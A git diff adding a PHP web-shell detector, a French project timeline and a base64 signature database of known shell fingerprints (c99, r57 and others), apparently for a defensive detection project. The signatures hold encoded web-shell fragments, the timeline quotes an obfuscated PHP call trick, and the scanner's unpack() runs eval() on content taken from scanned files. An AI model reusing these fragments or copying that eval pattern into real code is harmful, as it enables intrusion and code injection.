+    if (strlen($server_version) != 0 && intval($server_version) != 0 && (intval($server_version) > intval($version))) {
+      self::output($this->t('New version of shells signature database found. Please update!'), 'error');
+      return true;
+    } else if (strlen($server_version) == 0 || intval($server_version) == 0) {
+      self::output($this->t('Cant connect to server! Version check failed!'), 'error');
+    }
+    unset($this->fingerprints['version']);
+    return false;
+  }
+
+  /**
+   * Send file to analyze
+   */
+  private function sendfile() {
+    self::output('<style>.error{font-size: 14px;font-family: arial;margin: 0px;padding: 2px 6px 0px 0px;color: #DD3C10;text-align: center;}.success{font-size: 14px;font-family: arial;margin: 0px;padding: 2px 6px 0px 0px;color: #92B901;text-align: center;}</style>');
+    if (isset($_POST['filename'])) {
+      $filename = base64_decode($_POST['filename']);
+      if (file_exists($filename)) {
+        $email = isset($_POST['email']) ? $_POST['email'] : '';
+        $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : $_SERVER["SERVER_NAME"];
+        $postdata = http_build_query(array('task' => 'submit', 'ver' => '2', 'code' => base64_encode(file_get_contents($filename)), 'email' => $email, 'ip' => $_SERVER['REMOTE_ADDR']));
+        $context = stream_context_create(array('http' => array('method' => 'POST', 'header' => "Content-type: application/x-www-form-urlencoded\r\nReferer: " . $referer . "\r\n", 'content' => $postdata)));
+        $server_version = file_get_contents('http://www.shelldetector.com/api/', 0, $context);
+        self::output($server_version, 'success');
+      } else {
+        self::output($this->t('Cant find selected file.'), 'error');
+      }
+    } else {
+      self::output($this->t('No file specified.'), 'error');
+    }
+  }
+
+  /**
+   * Scan function executer
+   */
+  private function filescan() {
+    self::output($this->t('Starting file scanner, please be patient file scanning can take some time.'));
+    self::output($this->t('Number of known shells in database is: ') . count($this->fingerprints));
+    self::output('<div class="info">' . $this->t('Files found:') . '<span class="filesfound">', null, false);
+    $this->listdir($this->directory);
+    self::output('</span></div>', null, false);
+    if ($this->filelimit>0) {
+      if (count($this->_files) > $this->filelimit) {
+        self::output($this->t('File limit reached, scanning process stopped.'));
+      }
+    }
+    if ($this->filelimit>0) {
+      self::output($this->t('File scan done, we have: @count files to analize', array("@count" => count($this->_files))));
+    } else {
+      self::output($this->t('File scan done, we have: @count files to analize', array("@count" => $this->counter)));
+    }
+    if ($this->hidesuspicious) {
+      self::output($this->t('Please note suspicious files information will not be displayed'), 'error');
+    }
+  }
+
+  /**
+   * Show sha1 for found files
+   */
+  private function showsha() {
+    foreach ($this->_files as $file) {
+      self::output('<dl><dt>' . $this->t('Show sha for file:') . ' ' . basename($file) . '<span class="plus">-</span></dt>', null, false);
+      self::output('<dd><dl><dt>' . $this->t('Full path:') . '</dt><dd>' . $file . '</dd>', null, false);
+      self::output('<dt>' . $this->t('Sha1:') . '</dt><dd>' . sha1_file($file) . '</dd></dl></dd></dl>', null, false);
+    }
+    self::output('', 'clearer');
+  }
+
+  /**
+   * Check files for using suspicious function
+   */
+  private function analyze($file) {
+    $counter = 0;
+    $this->counter++;
+      $content = file_get_contents($file);
+      $base64_content = base64_encode($content);
+      $shellflag = $this->unpack($file, $content, $base64_content);
+
+      if ($shellflag != false) {
+        $this->fileInfo($file, $base64_content);
+        $shellcolor = 'red';
+        preg_match('#(.*)\[(.*?)\]\[(.*?)\]\[(.*?)\]#', $shellflag, $shellmatch);
+        if (is_array($shellmatch) && count($shellmatch)>0) {
+          $shellflag = $shellmatch[1] . '(' . $shellmatch[4] . ')';
+          switch($shellmatch[3]) {
+            case 1 :
+              $shellcolor = 'orange';
+              $shellflag .= ' ' . $this->t('please note it`s a malicious file not a shell');
+              break;
+            case 2:
+              $shellcolor = 'orange';
+              $shellflag .= ' ' . $this->t('please note potentially dangerous file (legit file but may be used by hackers)');
+              break;
+          }
+        }
+        if ($this->isConsole() && !$this->isBrief()) {
+          print "$file: $shellflag\n"; 
+        } 
+        self::output('<dt>' . $this->t('Fingerprint:') . '</dt><dd class="' . $shellcolor . '">' . $this->t('Positive, it`s a ') . $shellflag . '</dd></dl></dd></dl>', null, false);
+      } else if ($this->hidesuspicious != true) {
+     	 if (preg_match_all($this->_regex, $content, $matches)) {
+          $this->fileInfo($file, $base64_content);
+          if ($this->showlinenumbers) {
+            self::output('<dt>' . $this->t('suspicious functions used:') . '</dt><dd>', null, false);
+            $_content = explode("\n", $content);
+            for ($line = 0; $line < count($_content); $line++) {
+              if (preg_match_all($this->_regex, $_content[$line], $matches)) {
+                $lineid = md5($line . $file);
+                self::output($this->_implode($matches) . ' (<a href="#" class="showline" id="ne_' . $lineid . '">' . $this->t('line:') . ($line + 1) . '</a>);', null, false);
+                self::output('<div class="hidden source" id="line_' . $lineid . '"><code>' . htmlentities($_content[$line]) . '</code></div>', null, false);
+              }
+            }
+            self::output('&nbsp;</dd>', null, false);
+          } else {
+            self::output('<dt>' . $this->t('suspicious functions used:') . '</dt><dd>' . $this->_implode($matches) . '&nbsp;</dd>', null, false);
+          }
+          $key = $this->fileprepare($file, $base64_content);
+          self::output('<dt>' . $this->t('Fingerprint:') . '</dt><dd class="green">' . $key . '</dd></dl></dd></dl>', null, false);
+          $this->suspcounter++;
+        }
+      } else {
+        if (preg_match_all($this->_regex, $content, $matches)) {
+          $this->suspcounter++;
+        }
+      }
+  }
+
+  /**
+   * Check files for using suspicious function
+   */
+  private function anaylize() {
+    foreach ($this->_files as $file) {
+    	if (is_readable($file)) {
+      	$this->analyze($file);
+    	}  
+    }
+    self::output('', 'clearer');
+    self::output($this->t('<strong>Status</strong>: @count suspicious files found and @shells shells found. <a href="' . $_SERVER['PHP_SELF'] . '?s=1">Rescan and show suspicious files</a>' , array("@count" => $this->suspcounter, "@shells" => count($this->_badfiles) ? '<strong>' . count($this->_badfiles) . '</strong>' : count($this->_badfiles))), (count($this->_badfiles) ? 'error' : 'success'));
+  }
+
+  /**
+   * Prepare file submit function
+   */
+  private function fileprepare($file, $base64_content) {
+    $filtered_file = filter_var($file, FILTER_SANITIZE_SPECIAL_CHARS);
+    $key = $this->t('Negative') . ' <small class="source_submit_parent">(' . $this->t('if wrong') . ' <a href="#" id="m_' . md5($file) . '" class="source_submit">' . $this->t('submit file for analize') . '</a>)</small>';
+    $key .= '<div id="wrapform_' . md5($file) . '" class="hidden"><iframe border="0" scrolling="no" class="hidden" id="iform_' . md5($file) . '" name="iform_' . md5($file) . '" src="http://www.shelldetector.com/api/loader.html" />"></iframe>';
+    if ($this->submitfile == 0) {
+      $key .= '<form id="form_' . md5($file) . '" target="iform_' . md5($file) . '" action="http://www.shelldetector.com/api/?task=submit&ver=2" method="post">';
+    } else {
+      $key .= '<form id="form_' . md5($file) . '" target="iform_' . md5($file) . '" action="?task=sendfile" method="post">';
+    }
+    $key .= '<dl><dt>' . $this->t('Submit file') . ' ' . basename($filtered_file) . '</dt><dd>';
+    $key .= '<dl><dt class="submit_email">' . $this->t('Your email') . '<br /><span class="small">' . $this->t('(in case you want to be notified):') . '</span></dt><dd class="submit_email_field"><input type="text" name="email" id="email" value="" class="text ui-widget-content ui-corner-all" /></dd></dl></dd></dl>';
+
+    if ($this->submitfile == 0) {
+      if (function_exists('openssl_public_encrypt')) {
+        if (openssl_public_encrypt($base64_content, $crypted_data, base64_decode($this->_public_key))) {
+          $key .= '<input type="hidden" name="crypted" value="1" /><input type="hidden" name="code" value="' . base64_encode($crypted_data) . '" /></form>';
+        } else {
+          $key .= '<input type="hidden" name="code" value="' . $base64_content . '" />';
+        }
+      } else {
+        $key .= '<input type="hidden" name="code" value="' . $base64_content . '" />';
+      }
+    }
+    $key .= '<input type="hidden" name="filename" value="' . base64_encode($file) . '" /></form>';
+    $key .= '</div>';
+    return $key;
+  }
+
+  /**
+   * Show file information
+   */
+  private function fileInfo($file, $base64_content) {
+    $owner = fileowner($file);
+    $self_owner = getmyuid();
+    $permissions = substr(sprintf('%o', fileperms($file)), -4);
+    if (function_exists('posix_getpwuid')) {
+      $owner =  posix_getpwuid($owner);
+      $owner = $owner['name'];
+      $self_owner = posix_getpwuid($self_owner);
+      $self_owner = $self_owner['name'];
+    }
+    if ($owner !== $self_owner) {
+      $owner = '<span class="orange">' . $owner .'</span> <small>(' . $this->t('Please note: file have different owner') . ')</small>';
+    }
+    if (intval($permissions) == 777) {
+      $permissions = '<span class="orange">' . $permissions .'</span> <small>(' . $this->t('Please note: file have full access permissions') . ')</small>';
+    }
+    $filtered_file = filter_var($file, FILTER_SANITIZE_SPECIAL_CHARS);
+    self::output('<dl><dt>' . $this->t('Suspicious behavior found in:') . ' ' . basename($filtered_file) . '<span class="plus">-</span></dt>', null, false);
+    self::output('<dd><dl><dt>' . $this->t('Full path:') . '</dt><dd>' . $filtered_file . '</dd>', null, false);
+    self::output('<dt>' . $this->t('Owner:') . '</dt><dd>' . $owner . '</dd>', null, false);
+    self::output('<dt>' . $this->t('Permission:') . '</dt><dd>' . $permissions . '</dd>', null, false);
+    self::output('<dt>' . $this->t('Last accessed:') . '</dt><dd>' . date($this->dateformat, fileatime($file)) . '</dd>', null, false);
+    self::output('<dt>' . $this->t('Last modified:') . '</dt><dd>' . date($this->dateformat, filemtime($file)) . '</dd>', null, false);
+    self::output('<dt>' . $this->t('MD5 hash:') . '</dt><dd>' . md5($base64_content) . '</dd>', null, false);
+    self::output('<dt>' . $this->t('Filesize:') . '</dt><dd>' . $this->HumanReadableFilesize($file) . '</dd>', null, false);
+  }
+
+  /**
+   * Unpacking function, main idea taken from http://www.tareeinternet.com/
+   */
+  private function unpack($file, $content, $base64_content) {
+    if ($flag = ($this->fingerprint($file, $base64_content)) ) {
+      return $flag;
+    } elseif ($flag = ($this->fingerprint($file, $content))) {
+      return $flag;
+    } else {
+      $counter = 0;
+      $encoded_content = preg_replace("/<\?php|\?>|<\?/", "", $content);
+      $temp = array();
+      if (preg_match("/(\beval\b\(gzinflate|\beval\b\(base64_decode)/", $encoded_content)) {
+        while (preg_match("/\beval\((gzinflate|base64_decode)\((.*?)\);/", $encoded_content, $matches)) {
+          $encoded_content = preg_replace("/<\?php|\?>|<\?|eval/", "", $encoded_content);
+          $temp = $matches;
+          if (isset($matches[1]) && isset($matches[2]) && strpos($matches[2], '$') === false) {
+            eval("\$encoded_content = " . $matches[1] . '(' . $matches[2] . ";");
+          } else if (isset($matches[1]) && isset($matches[2]) && strpos($matches[2], '$') !== false) {
+            preg_match('/\$(.*?)\)/', $matches[2], $variable);
+            if (isset($variable[1])) {
+              preg_match('/\$' . $variable[1] . '=(.*?);/', $content, $content_match);
+              if (isset($content_match[1])) {
+                $content_temp = $matches[1] . '(' . str_replace('$' . $variable[1], $content_match[1], $matches[2]);
+                eval("\$encoded_content = " . $content_temp . ";");
+              } else {
+                $encoded_content = '';
+              }
+            } else {
+              $encoded_content = '';
+            }
+          } else {
+            $encoded_content = '';
+          }
+          if ($counter > 20) {
+            //protect from looping
+            break;
+          }
+          $counter++;
+        }
+      } else if (preg_match("/preg_replace.*\/e\"/", $encoded_content)) {
+        while (preg_match("/preg_replace\((.*?)\/e(.*)\);/", $encoded_content, $matches)) {
+          $encoded_content = preg_replace("/<\?php|\?>|<\?/", "", $encoded_content);
+          preg_replace("/preg_replace\((.*?)\/e(.*)\);/", "", $encoded_content);
+          if (isset($matches[1]) && isset($matches[2])) {
+            eval("\$encoded_content = preg_replace(" . $matches[1] . '/' . $matches[2] . ');');
+          }
+          if ($counter > 20) {
+            //protect from looping
+            break;
+          }
+          $counter++;
+        }
+      } else {
+        $encoded_content = '';
+      }
+      if ($encoded_content != '') {
+        $encoded_content64 = base64_encode($encoded_content);
+        $flag = $this->fingerprint($file, $encoded_content64);
+      } else {
+        $flag = false;
+      }
+    }
+    return $flag;
+  }
+
+  /**
+   * Fingerprint function
+   */
+  private function fingerprint($file, $content = null) {
+    $key = false;
+    
+    // pre prepare all the fingerprints on the first request for optimisation.
+    static $fingerprint_cache = array();
+    if(empty($fingerprint_cache) === true){
+        foreach ($this->fingerprints as $fingerprint => $shell){
+            if (strpos($fingerprint, 'bb:') !== false) {
+                $fingerprint = base64_decode(str_replace('bb:', '', $fingerprint));
+            }
+            $fingerprint_cache['/' . preg_quote($fingerprint, '/') . '/'] = $shell;
+        }
+    }
+    
+    foreach ($fingerprint_cache as $fingerprint => $shell) {
+      if (preg_match($fingerprint, $content)) {
+        # [version] => 1359928984 db content FIXME?!?!?
+        if ($fingerprint == "version") break;
+        $key = $shell;
+        $this->_badfiles[] = $file;
+        break;
+      }
+    }
+    return $key;
+  }
+
+  /**
+   * Recursively implode array
+   */
+  private function _implode($array, $glue = ', ') {
+    $temp = array();
+    foreach ($array as $value) {
+      if (is_array($value)) {
+        $temp[] = $this->_implode($value);
+      } else {
+        $temp[] = $value;
+      }
+    }
+    return implode($glue, array_unique($temp));
+  }
+
+  /**
+   * Output footer function
+   */
+  private function footer() {
+    self::output('</div></body></html>', null, false);
+    if ($this->is_cron || $this->console) {
+      $this->flush();
+    }
+  }
+
+  /**
+   * Output header function
+   */
+  private function header() {
+    $style = '<style type="text/css" media="all">body{background-color:#ccc;font:13px tahoma,arial;color:#151515;direction:ltr}h1{text-align:center;font-size:24px}dl{margin:0;padding:0}#content{width:1024px;margin:0 auto;padding:35px 40px;border:1px solid #e8e8e8;background:#fff;overflow:hidden;-webkit-border-radius:7px;-moz-border-radius:7px;border-radius:7px}dl dt{cursor:pointer;background:#5f9be3;color:#fff;float:left;font-weight:700;margin-right:10px;width:99%;position:relative;padding:5px}dl dt .plus{position:absolute;right:4px}dl dd{margin:2px 0;padding:5px 0}dl dd dl{margin-top:24px;margin-left:60px}dl dd dl dt{background:#4fcba3!important;width:180px!important}.error{background-color:#ffebe8;border:1px solid #dd3c10;padding:4px 10px;margin:5px 0}.success{background-color:#fff;border:1px solid #bdc7d8;padding:4px 10px;margin:5px 0}.info{background-color:#fff9d7;border:1px solid #e2c822;padding:4px 10px;margin:5px 0}.clearer{clear:both;height:0;font-size:0}.hidden{display:none}.green{font-weight:700;color:#92b901}.red{font-weight:700;color:#dd3c10}.orange{font-weight:700;color:#ff7f00}.green small{font-weight:400!important;color:#151515!important}.filesfound {position: relative}.files {position: absolute;left:4px;background-color:#FFF9D7}iframe{border:0px;height:80px;width:100%}.small{font-size: 10px;font-weight:normal;}.ui-widget-content dl dd dl {margin-left: 0px !important;}.ui-widget-content input {width: 310px;margin-top: 4px;}.submit_email {width: 190px !important;}.submit_email_field{float: left; width: 100px !important;}#loader{position:fixed;top:25%;bottom:0;left:45%;z-index:99;display:block;text-align:center;width:100%;padding-top:125px;text-align:left;font-weight:700;text-transform:uppercase;text-indent:-20px;font-size:24px;color:#5f9be3}#circularG{position:relative;width:128px;height:128px}.circularG{position:absolute;background-color:#5f9be3;width:29px;height:29px;-webkit-border-radius:19px;-moz-border-radius:19px;-webkit-animation-name:bounce_circularg;-webkit-animation-duration:1.04s;-webkit-animation-iteration-count:infinite;-webkit-animation-direction:linear;-moz-animation-name:bounce_circularg;-moz-animation-duration:1.04s;-moz-animation-iteration-count:infinite;-moz-animation-direction:linear;border-radius:19px;-o-animation-name:bounce_circularg;-o-animation-duration:1.04s;-o-animation-iteration-count:infinite;-o-animation-direction:linear;-ms-animation-name:bounce_circularg;-ms-animation-duration:1.04s;-ms-animation-iteration-count:infinite;-ms-animation-direction:linear}#circularG_1{left:0;top:50px;-webkit-animation-delay:.39s;-moz-animation-delay:.39s;-o-animation-delay:.39s;-ms-animation-delay:.39s}#circularG_2{left:14px;top:14px;-webkit-animation-delay:.52s;-moz-animation-delay:.52s;-o-animation-delay:.52s;-ms-animation-delay:.52s}#circularG_3{top:0;left:50px;-webkit-animation-delay:.65s;-moz-animation-delay:.65s;-o-animation-delay:.65s;-ms-animation-delay:.65s}#circularG_4{right:14px;top:14px;-webkit-animation-delay:.78s;-moz-animation-delay:.78s;-o-animation-delay:.78s;-ms-animation-delay:.78s}#circularG_5{right:0;top:50px;-webkit-animation-delay:.91s;-moz-animation-delay:.91s;-o-animation-delay:.91s;-ms-animation-delay:.91s}#circularG_6{right:14px;bottom:14px;-webkit-animation-delay:1.04s;-moz-animation-delay:1.04s;-o-animation-delay:1.04s;-ms-animation-delay:1.04s}#circularG_7{left:50px;bottom:0;-webkit-animation-delay:1.17s;-moz-animation-delay:1.17s;-o-animation-delay:1.17s;-ms-animation-delay:1.17s}#circularG_8{left:14px;bottom:14px;-webkit-animation-delay:1.3s;-moz-animation-delay:1.3s;-o-animation-delay:1.3s;-ms-animation-delay:1.3s}@-webkit-keyframes bounce_circularg{0%{-webkit-transform:scale(1)}100%{-webkit-transform:scale(.3)}}@-moz-keyframes bounce_circularg{0%{-moz-transform:scale(1)}100%{-moz-transform:scale(.3)}}@-o-keyframes bounce_circularg{0%{-o-transform:scale(1)}100%{-o-transform:scale(.3)}}@-ms-keyframes bounce_circularg{0%{-ms-transform:scale(1)}100%{-ms-transform:scale(.3)}}</style>';
+    $script = 'function init(){$("#loader").hide();$("dt").live("click", function(){var text=$(this).children(".plus");if(text.length){$(this).next("dd").slideToggle();if(text.text()=="+"){text.text("-")}else{text.text("+")}}});$(".showline").live("click", function(){var id="li"+$(this).attr("id");$("#"+id).dialog({height:440,modal:true,width:600,title:"Source code"});return false});$(".source_submit").live("click",function(){var id="for"+$(this).attr("id");$("#wrap"+id).dialog({autoOpen:false,height:200,width:550,modal:true,resizable: false,title:"File submission",buttons: {"Submit file to analysis": function() {if ($(".ui-dialog-content form").length) {$("#i"+id).removeClass("hidden");$("#"+id).submit();$(".ui-dialog-content form").remove();} else {alert("This file already submited");}}/*,"Submit file to Virustotal": function () {alert("Not implemented");}*/}});$("#wrap"+id).dialog("open");return false})}$(document).ready(init);';
+    self::output('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex"><title>Web Shell Detector</title>' . $style . '<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.21/themes/base/jquery-ui.css" type="text/css" media="all" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript" charset="utf-8"></script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.21/jquery-ui.js" type="text/javascript" charset="utf-8"></script><script type="text/javascript">' . $script . '</script></head><body><h1>' . $this->_title . ' v' . $this->_version . '<br />(PHP Version: ' . phpversion() .')</h1><div id="loader"><div id="circularG"><div id="circularG_1" class="circularG"></div><div id="circularG_2" class="circularG"></div><div id="circularG_3" class="circularG"></div><div id="circularG_4" class="circularG"></div><div id="circularG_5" class="circularG"></div><div id="circularG_6" class="circularG"></div><div id="circularG_7" class="circularG"></div><div id="circularG_8" class="circularG"></div></div><span class="loader_text"> ' . $this->t('Please wait') . '</span></div></div><div id="content">', null, false);
+  }
+
+  /**
+   * Output
+   */
+  static function output($content, $class = 'info', $html = true) {
+    if ((isset(self::$_settings) && isset(self::$_settings['is_cron']) && self::$_settings['is_cron']) ||
+      (isset(self::$_settings) && isset(self::$_settings['console']) && self::$_settings['console'])) {
+      if ($html) {
+        self::$_output .= '<div class="' . $class . '">' . $content . '</div>';
+      } else {
+       self::$_output .= $content;
+      }
+    } else {
+      if ($html) {
+        print '<div class="' . $class . '">' . $content . '</div>';
+      } else {
+        print $content;
+      }
+      flush();
+    }
+  }
+
+  /**
+   * Save scanned data to file
+   */
+  private function flush() {
+    if ($this->isConsole()) {
+      print "$this->counter files, $this->suspcounter suspicious, ".count($this->_badfiles)." shells\n";
+    } 
+    if ($this->is_cron) {
+      $filename = date($this->report_format, time());
+      if (file_put_contents($filename, self::$_output)) {
+        print $this->t('Done, report file created');
+      } else {
+        print $this->t('Error, report file creation failed');
+      }
+    }
+  }
+
+  /**
+   * Translate function (ported from Drupal)
+   */
+  private function t($string, $args = array()) {
+    if ($this->language) {
+      if (is_file('lang/' . $this->language . '.php')) {
+        include ('lang/' . $this->language . '.php');
+        if (isset($local[$string])) {
+          $string = $local[$string];
+        }
+      }
+    }
+
+    if (empty($args)) {
+      return $string;
+    } else {
+      foreach ($args as $key => $value) {
+        switch ($key[0]) {
+          case '@' :
+            $args[$key] = $value;
+            break;
+        }
+      }
+      return strtr($string, $args);
+    }
+  }
+
+  /**
+   * Recursivly list directories
+   */
+  private function listdir($dir) {
+    if (!is_dir($dir) || !is_readable($dir)) {
+    return true;
+  }
+  $handle = opendir($dir);
+    if ($this->filelimit > 0) {
+      if (count($this->_files) > $this->filelimit) {
+        return true;
+      }
+    }
+    while (($file = readdir($handle)) !== false) {
+      if ($file == '.' || $file == '..') {
+        continue;
+      }
+      $filepath = $dir == '.' ? $file : $dir . '/' . $file;
+      if (is_link($filepath)) {
+        continue;
+      }
+      if (is_file($filepath)) {
+        if (substr(basename($filepath), 0, 1) != "." || $this->scan_hidden) {
+          $extension = pathinfo($filepath);
+          if (is_string($this->extension) && $this->extension == '*') {
+            if ($this->filelimit > 0) {
+              $this->_files[] = $filepath;
+            } else {
+              $this->analyze($filepath);
+            }
+          } else {
+            if (isset($extension['extension']) && in_array($extension['extension'], $this->extension)) {
+              if ($this->_self != basename($filepath)) {
+                if ($this->filelimit > 0) {
+                $this->_files[] = $filepath;
+                } else {
+                  $this->analyze($filepath);
+                }
+              }
+            }
+          }
+        }
+      } else if (is_dir($filepath)) {
+        if (substr(basename($filepath), 0, 1) != "." || $this->scan_hidden) {
+          $this->listdir($filepath);
+        }
+      }
+    }
+    self::output('<span class="files">' . count($this->_files) . '</span>', null, false);
+    closedir($handle);
+  }
+
+  /**
+   * Returns a human readable filesize
+   * @author      wesman20 (php.net)
+   * @author      Jonas John
+   * @version     0.3
+   * @link        http://www.jonasjohn.de/snippets/php/readable-filesize.htm
+   */
+  private function HumanReadableFilesize($file) {
+    $size = filesize($file);
+    $mod = 1024;
+    $units = explode(' ', 'B KB MB GB TB PB');
+    for ($i = 0; $size > $mod; $i++) {
+      $size /= $mod;
+    }
+    return round($size, 2) . ' ' . $units[$i];
+  }
+
+  /**
+   * Own error handler
+   */
+  static public function error_handler($errno, $errstr, $errfile, $errline) {
+    switch ($errno) {
+      case E_USER_WARNING :
+      case E_USER_ERROR :
+      case E_USER_NOTICE :
+      default :
+        shellDetector::output('<strong>Error: </strong>' . $errstr . ' line: ' . $errline, 'error');
+        break;
+    }
+  }
+
+}
+?>
diff --git a/doc/PHP-Shell-Detector-master/version/app b/doc/PHP-Shell-Detector-master/version/app
new file mode 100644
index 0000000000000000000000000000000000000000..243507d7129c493d1ad5618ef18e1f1f721d6dff
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/version/app
@@ -0,0 +1 @@
+1.66
\ No newline at end of file
diff --git a/doc/PHP-Shell-Detector-master/version/db b/doc/PHP-Shell-Detector-master/version/db
new file mode 100644
index 0000000000000000000000000000000000000000..02f5d84669f1220b177bc878363a606438c27324
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/version/db
@@ -0,0 +1 @@
+1405674947
\ No newline at end of file
diff --git a/doc/planning.txt b/doc/planning.txt
new file mode 100644
index 0000000000000000000000000000000000000000..6fd2c9e8e2eb5669d3979a2e5384a5abf74c5777
--- /dev/null
+++ b/doc/planning.txt
@@ -0,0 +1,15 @@
+27.10~10.11 Découverte des outils de développement, recherche de différentes techniques de recherche. Développement de quelques routines de détection basiques
+11.11~24.11 Développement plus approfondi: cas d'une détection basée sur les signatures. Début de l'élaboration d'une architecture plus précise
+25.11~15.12 Début du développement du module concernant l'entropie, l'indentation, et éventuellement l'obfuscation
+16.12~29.12 Evaluation de l'efficacité des techniques mises en place et renforcement des moyens de détection (ou inveresement si trop de faux positifs)
+30.12~12.01 Recherche sur les méthodes de détection basée sur la sémantique et sur les règles YARA. Début du développement selon des éléments
+13.01~02.02 Début du développement d'un module de détection cherchant des patterns simples: routines dangereuses, code obfusqué, fonctions anonymes,
+manipulations sur des strings suspectes (par ex "preg_replace('/x|\s+/','p', ['xh   info'][0])();") ...
+03.02~16.02 Renforcement du module développé, et début de l'élaboration de l'analyse des résultats
+17.02~09.03 Développement d'un module de détection basé sur les règles YARA plus poussé
+10.03~23.03 Renforcement du système d'analyse des résultats et début du développement d'un module de détection basé sur la fuite d'information.
+(alors que les modules précédents étaient plutôt basés sur de vrais dangers comme des appels système. Ici, ce module de concentrera plutot sur des
+routines comme phpinfo())
+24.03~13.04 Renforcement du système d'analyse des résultats
+...
+a compléter
diff --git a/res/shelldetect.db b/res/shelldetect.db
new file mode 100755
index 0000000000000000000000000000000000000000..8e3d5015188f44606d07bfc9fabc7ff4f34900c4
--- /dev/null
+++ b/res/shelldetect.db
@@ -0,0 +1,1065 @@
+YTo2MDQ6e3M6NjQ6IlhScGJ5QXFJQzQzTlNrN0RRb05DaUFnSUNCbWIzSWdLQ1JwSUQwZ01Ec2dK
+R2tnUENBa2JXSmZiR1Z1WjNSb08iO3M6MjE6InBocGVtYWlsZXJbMF1bMl1bcGhwXSI7czo2NDoi
+T3drSkNRb0tDV1JsWm1GMWJIUTZDZ2tKYzJodmQxOXNjeWdwT3dwOUNncG1kVzVqZEdsdmJpQnph
+RzkzWDJ4eiI7czoxNToiY21kWzMxXVswXVtwaHBdIjtzOjY0OiJaZGtvNVRUTlVSM0pJTDJSdlYw
+TTBXRzFCUld0WlZuZEJRMVZRVVdRd1IydzBOM1ZFYWxJaUxDSmpNa2R5YlZSIjtzOjE3OiJub25h
+bWVbMV1bMF1bcGhwXSI7czo2NDoiMmh2SUNJTkNna0pDUWtOQ2drSklDQWdJQWs4ZEhJK0RRb0pD
+UWtnSUNBZ0lDQThkR1FnZDJsa2RHZzlKekV3SiI7czoyMjoiaGlkZGVuc2hlbGxbMF1bMF1bcGhw
+XSI7czo2NDoiY205c09pQnVieTFqWVdOb1pWeHVJanNOQ25CeWFXNTBJQ0pEYjI1MFpXNTBMWFI1
+Y0dVNklIUmxlSFF2YUhSdCI7czoxNDoiY21kWzI0XVswXVtwbF0iO3M6NjQ6Ikp5UGdvZ0lDQWdJ
+Q0FnSUR4aWNpQXZQanhpY2lBdlBpQThMMlp2Ym5RK0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnUEQiO3M6
+MTk6InM3MnNoZWxsWzBdWzBdW3BocF0iO3M6MTI2OiJHUmxabUYxYkhSZmRYTmxYMkZxWVhnZ1BT
+QjBjblZsT3lBa1pHVm1ZWFZzZEY5amFHRnljMlYwSUQwZ0oxZHBibVJ2ZDNNdE1USTFNU2M3SUds
+bUtDRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhSVTUiO3M6MjU6ImNvY2Fj
+b2xhX3NoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlBFWlBVazBnUlU1RFZGbFFSVDBpYlhWc2RHbHdZ
+WEowTDJadmNtMHRaR0YwWVNJZ1FVTlVTVTlPUFNKMWNHeHYiO3M6MjY6InNoZWxsX3VwbG9hZGVy
+WzEwXVswXVtwaHBdIjtzOjY0OiJXRnlaMmx1TFd4bFpuUTZOWEI0T3lCdFlYSm5hVzR0Y21sbmFI
+UTZOWEI0T3ljK2JHOW5hVzQ2UEM5emNHRnVQIjtzOjE0OiJjaWhbMF1bMF1bcGhwXSI7czo2NDoi
+WmlrdUlpa2hQQzlpUGp3dlkyVnVkR1Z5UGlJN2ZRMEtJQ0JsYkhObElIdGxZMmh2SUNJOFkyVnVk
+R1Z5UGp4aSI7czoxNToiYzk5WzI2XVswXVtwaHBdIjtzOjY0OiJoYldVb0tTNGlYRzRpT3cwS1B6
+NE5DanhvY2o0OEwzQnlaVDROQ2lBZ0lDQThkR0ZpYkdVK1BHWnZjbTBnYldWIjtzOjIwOiJsYW1h
+c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiRlVsc25Va1ZOVDFSRlgwRkVSRkluWFR0bFkyaHZJQ0ln
+YzJsNlpUMHhOejQ4TDNSa1Bqd3ZkSEkrUEhSeVBqeCI7czoxNzoiamFja2FsWzFdWzBdW3BocF0i
+O3M6NjQ6IkNna0pDV0Z5Y21GNVgzQnZjQ2drWlhoNEtUc05DZzBLQ1FrSlB6NE5DZzBLQ1FrSlJH
+bHlaV04wYjNKNUlFTnYiO3M6MTc6ImNzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJhekUxTUM1a1pT
+OTNMMlJrSWlrN0lBMEtjM2x6ZEdWdEtDSmphRzF2WkNBM056Y2daR1FpS1RzZ0RRcHplWE4wIjtz
+OjE3OiJ0cm95YW5bMF1bMF1bcGhwXSI7czo2NDoiUVowbFNObkpXVUZkdFJqRmFWbXRtZUhKQkx6
+UkhVMUV5SzNaSFoyTkdXVmRhZUZaaWRVbHhZMHcwTWxOTlNUSiI7czoxNzoiYjM3NGtbMTNdWzBd
+W3BocF0iO3M6NjQ6ImxkR012YUhSMGNHUXVZMjl1WmcwS0wyVjBZeTl3ZFhKbExXWjBjR1F1WTI5
+dVpnMEtMMlYwWXk5d2RYSmxMV1oiO3M6MjA6InBocHNoZWxsWzMyXVswXVtwaHBdIjtzOjY0OiJM
+VlVuTENBblkzQTROalluS1RzS0NTUnZjSFJmWTJoaGNuTmxkSE1nUFNBbkp6c0tDV1p2Y21WaFky
+Z29KR05vIjtzOjE5OiJmaWxlc21hbls5XVswXVtwaHBdIjtzOjY0OiJPblIvVlVBalFDWmtOMlFp
+SzJReVMzZ3ZmeUJKZjA1clRXNWVXU3hLTkZsUGQyd21TbWhCYUdNdldDZ3JMbEp4IjtzOjIwOiJj
+eWJlcnNweTVbMF1bMF1bYXNwXSI7czo2NDoiRmpkR2x2YmowbmFIUjBjRG92TDNkM2R5NW9ZWE5v
